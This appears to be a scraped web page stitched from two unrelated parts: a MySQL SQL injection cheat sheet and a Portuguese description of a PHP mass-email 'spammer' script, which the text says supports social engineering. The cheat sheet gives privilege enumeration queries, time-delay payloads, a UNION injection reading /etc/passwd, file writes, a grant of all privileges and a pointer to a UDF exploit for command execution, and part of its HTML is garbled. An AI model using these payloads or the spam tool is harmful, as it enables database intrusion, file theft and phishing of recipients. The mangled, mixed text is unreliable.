List Privileges	SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts	SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database	SELECT database()
List Databases	SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv
List Columns	SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables	SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name	SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth Row	SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char	SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND	SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0
ASCII Value -> Char	SELECT char(65); # returns A
Char -> ASCII Value	SELECT ascii(‘A’); # returns 65
Casting	SELECT cast(’1′ AS unsigned integer); SELECT cast(’123′ AS char);
String Concatenation	SELECT CONCAT(‘A’,'B’); #returns AB SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If Statement	SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case Statement	SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes	SELECT 0×414243; # returns ABC
Time Delay	SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests	Impossible?
Command Execution	If mysqld (<5 .0="" .so="" a="" account="" and="" as="" by="" can="" commands="" compromise="" contain="" dba="" defined="" execute="" file="" function="" href="http://www.0xdeadbeef.info/exploits/raptor_udf.c" into="" is="" lib="" nbsp="" object="" or="" os="" root="" running="" shared="" should="" similar="" the="" uploading="" user="" usr="" you="">raptor_udf.c

explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform. Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system Hostname, IP Address SELECT @@hostname; Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv Delete Users DROP USER test1; — priv Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv Location of DB files SELECT @@datadir; Default/System Databases information_schema (>= mysql 5.0)
mysql

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script spammer para envio em massa, diferenciado pois vai dar uma grande consistência na sua engenharia social
Vinculado com banco de dados Mysql suas msg chegaram de forma dinâmica
Com os seguinte dados
---------------------------------------
nome,email,cargo,end,data
---------------------------------------
ONDE ne sua engenharia html ficara da seguinte forma com os parâmetros.
Nome do cliente: NOME_ENG

Email do cliente: EMAIL_ENG

Cargo do
cliente: CARGO_ENG
Data do envio que você determinou no campo banco: DATA_ENG


Esses dados serão filtrados e trocados pelos os do banco de dados.
A function MAIL(); deve esta devidamente configurada.

Na function conectart() é definido os dados de acesso do BD.
Configuração de envio.

$GLOBALS['assunto'] = "O assunto usado!";

$GLOBALS['email_remetente'] =  "Remetendete.com.br";

$GLOBALS['eng_arq'] = "seuarquivo.html";

Exemplo de arqvui

Nome do cliente: NOME_ENG

Email do cliente: EMAIL_ENG

Cargo do cliente: CARGO_ENG

Data do envio que você determinou no campo banco: DATA_ENG

Modo de uso

php script.php